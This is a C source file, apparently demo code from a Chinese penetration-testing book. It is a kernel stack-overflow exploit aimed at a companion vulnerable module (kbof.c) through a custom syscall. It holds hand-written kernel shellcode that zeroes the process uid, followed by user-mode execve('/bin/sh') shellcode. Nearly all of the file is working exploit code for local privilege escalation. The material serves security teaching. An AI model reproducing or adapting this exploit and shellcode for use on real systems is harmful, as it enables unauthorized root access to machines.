kbof_exploit.c

网络渗透技术配书源码

/* kbof_exploit.c
*
*  《网络渗透技术》演示程序
*  作者：san, alert7, eyas, watercloud
*
*  针对kbof.c的利用程序
*  gcc -o kbof_exploit kbof_exploit.c
*/

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <unistd.h>
#include <linux/unistd.h>
#include <linux/sysctl.h>
#define __NR_new_function           240
static inline _syscall2(int, new_function, unsigned int ,len,char * ,code);
#define NOP 'A'

char shellcode[]={
//0x0,0x00,0x00,0xff,
//0x50,//push 5eax
//0x53,//push %ebx
0xb8,0x2b,0x00,0x00,0x00,//mov $0x2b,%eax
0x50,//push %eax
0x50,
0x1f,//pop %ds
0x07,//pop %es
0x89,0xe0,//mov %esp,%eax
//next
0x83,0xc0,0x04,//add $0x4,%eax
0x8b,0x18,//mov (%eax),%ebx
0x83,0xfb,0x23,//cmp $0x23,%ebx
0x75,0xf6,//jne next

0x83,0xe8,0x04,//sub %0x04,%eax
0x89,0xc4,//mov %eax,%esp
0x89,0x28,//mov %ebp,(%eax)

0xb8,0x00,0xe0,0xff,0xff, /*mov    $0xffffe000,%eax*/
0x21,0xe0,
0xc7,0x80,0x28,0x01,0x00,0x00,0x00,0x00,0x00,0x00,/*movl   $0x0,0x128(%eax) */
//0x5b,//pop %ebx
//0x58,//pop %eax
0xcf /* iret */

};
char shell[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/bin/sh";

void test(void)

{
void (* f)( void );

f = (void *) shell; (* f)();
exit(0);
}
int main(int argc,char **argv)
{
        char code[1024];
        unsigned int len;


        memset(code,NOP,1024);
        memcpy(code,shellcode,sizeof(shellcode));

        len = 256+8+4+4;

        printf("code addr is:%p\n",code);
        *(int *)(code+256+8+4) = (int)code;//eip
        *(int *)(code+256+8) = (int)test;//ebp
        new_function(len,code);

}